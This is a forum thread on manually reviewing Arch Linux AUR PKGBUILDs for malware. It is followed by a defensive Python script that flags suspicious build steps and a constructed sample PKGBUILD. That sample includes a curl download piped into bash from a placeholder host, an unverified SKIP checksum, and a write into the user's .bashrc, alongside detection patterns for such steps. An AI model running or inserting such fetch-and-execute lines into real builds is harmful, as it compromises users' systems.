Does anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?
I do, but not as closely or as often as I should. Recent malware is a reminder to be careful, I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.
Sort of, but I don’t know what I’m looking for. It would be nice if folks explained what a bad one looks like.
Look for comments that say “# THIS IS MALWARE”
Yeah, paru makes it pretty easy to do, and can also build packages in a chroot, adding some extra security.
I do; also, most AUR helpers skip reviewing or make it a chore.
At the risk of getting downvoted, I wonder if an LLM would spot it.
I don’t know if it’s being done, but since AI is here to stay, and these sort of tasks seem to fit with their capabilities, maybe a group could carry out testing.
Also with paru. I mainly check that the download shows the correct URL and does standard stuff with it.
Yes, always!
I keep hearing people say this like it’s a defense against malware and supply chain attacks.
Reviewing PKGBUILDs only protects against dumb laziness on the part of the attacker, like they just install a stupidly obvious binary called “virus”.
What are you checking for in the PKGBUILD?
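As an added example (not part of this thread, and not code from paru or any other AUR helper), here is a small Python script that turns the checks people mention above into something mechanical: it confirms that each entry in source= points at the project's own upstream host, flags a SKIP checksum on a non-VCS source, and reads prepare()/build()/package() line by line for things like a download piped into a shell or writes into the user's home instead of $pkgdir. The PKGBUILD it runs on is constructed for this example; the package name and hostnames in it are made up. As the last comment points out, this catches only the lazy cases and is a starting point for a human read of the file, not a replacement for one.

```python
import re
from urllib.parse import urlparse

# Constructed sample PKGBUILD (not a real AUR package) with the red flags this
# thread talks about: a second source hosted away from upstream with a 'SKIP'
# checksum, a build() that pipes a download into a shell, and a package() that
# writes into the user's home instead of $pkgdir.
SAMPLE_PKGBUILD = r'''
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
url="https://github.com/example-org/example-tool"
source=("$pkgname-$pkgver.tar.gz::https://github.com/example-org/example-tool/archive/v$pkgver.tar.gz"
        "helper.sh::https://cdn.example.invalid/helper.sh")
sha256sums=('1111111111111111111111111111111111111111111111111111111111111111'
            'SKIP')

build() {
  cd "$pkgname-$pkgver"
  curl -fsSL https://cdn.example.invalid/setup.sh | bash
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  echo 'export PATH=$PATH:/opt/example' >> "$HOME/.bashrc"
}
'''

_ASSIGN_RE = re.compile(r'^(\w+)=(?!\()(.*)$', re.M)               # name=value, not arrays
_ARRAY_RE = re.compile(r'^(\w+)=\((.*?)\)', re.M | re.S)           # name=( ... ), may span lines
_WORD_RE = re.compile(r'"([^"]*)"|\'([^\']*)\'|(\S+)')             # array items, quoted or bare
_FUNC_RE = re.compile(r'^(\w+)\s*\(\)\s*\{(.*?)^\}', re.M | re.S)  # fn() { ... } closed at column 0
_VCS_RE = re.compile(r'^(?:[^:]+::)?(?:git|hg|svn|bzr|fossil)\+')  # VCS sources legitimately use SKIP
_NET_RE = re.compile(r'\b(curl|wget|git\s+clone)\b')

# Things that are rarely needed in an honest build and deserve a close look.
RISKY_PATTERNS = [
    (re.compile(r'\b(curl|wget)\b.*\|\s*(ba)?sh\b'), "download piped straight into a shell"),
    (re.compile(r'\bbase64\b.*(-d\b|--decode)'), "base64-decoded blob at build time"),
    (re.compile(r'\beval\b'), "eval of a constructed command"),
    (re.compile(r'(\$HOME\b|~/|/home/)'), "touches the user's home directory instead of $pkgdir"),
    (re.compile(r'\bsudo\b'), "runs sudo during the build"),
]

def parse_scalars(text):
    """Simple name=value assignments, quotes stripped, used for $var expansion."""
    return {n: v.strip().strip('"\'') for n, v in _ASSIGN_RE.findall(text)}

def expand(value, scalars):
    """Expand $var / ${var} from the scalars we know; unknown variables stay as-is."""
    return re.sub(r'\$\{?(\w+)\}?', lambda m: scalars.get(m.group(1), m.group(0)), value)

def parse_arrays(text):
    """{name: [items]} for every name=( ... ) array, honouring quoting."""
    return {n: [a or b or c for a, b, c in _WORD_RE.findall(body)]
            for n, body in _ARRAY_RE.findall(text)}

def parse_functions(text):
    """{name: body} for prepare/build/package-style functions (no nested column-0 braces)."""
    return {n: body.strip('\n') for n, body in _FUNC_RE.findall(text)}

def source_url(entry):
    """Drop the 'localname::' prefix and any 'git+' style VCS prefix from a source entry."""
    url = entry.split('::', 1)[1] if '::' in entry else entry
    return url.split('+', 1)[1] if '://' in url and '+' in url.split('://', 1)[0] else url

def review(text):
    """Return a list of (severity, message) findings for one PKGBUILD."""
    findings = []
    scalars, arrays, funcs = parse_scalars(text), parse_arrays(text), parse_functions(text)
    upstream = urlparse(expand(scalars.get('url', ''), scalars)).hostname or ''
    # Assumes a single *sums array; checksums are matched to sources by position.
    sums = next((items for name, items in arrays.items() if name.endswith('sums')), [])

    for idx, entry in enumerate(arrays.get('source', [])):
        url = source_url(expand(entry, scalars))
        host = urlparse(url).hostname
        if host is None:
            continue  # local file shipped with the PKGBUILD; read it separately
        if upstream and host != upstream:
            findings.append(('info', f'source[{idx}] is hosted on {host}, not upstream {upstream}: {url}'))
        if idx < len(sums) and sums[idx] == 'SKIP' and not _VCS_RE.match(entry):
            findings.append(('high', f'source[{idx}] has checksum SKIP, so the download is never verified: {url}'))

    for fname in ('prepare', 'pkgver', 'build', 'check', 'package'):
        for lineno, line in enumerate(funcs.get(fname, '').splitlines(), 1):
            line = line.strip()
            if not line or line.startswith('#'):
                continue
            if _NET_RE.search(line):
                findings.append(('high', f'{fname}() line {lineno} fetches from the network, bypassing source= and its checksums: {line}'))
            for pattern, why in RISKY_PATTERNS:
                if pattern.search(line):
                    findings.append(('high', f'{fname}() line {lineno}: {why}: {line}'))
    return findings

if __name__ == '__main__':
    for severity, message in review(SAMPLE_PKGBUILD):
        print(f'[{severity}] {message}')
```

Running the file prints one info finding (the second source lives on a different host than url=) and four high findings (the SKIP checksum, the build-time fetch, the pipe into bash, and the write to $HOME). review() takes any PKGBUILD text, so the same function can be pointed at the file a helper shows you during its review step; a package with nothing unusual in it produces an empty list.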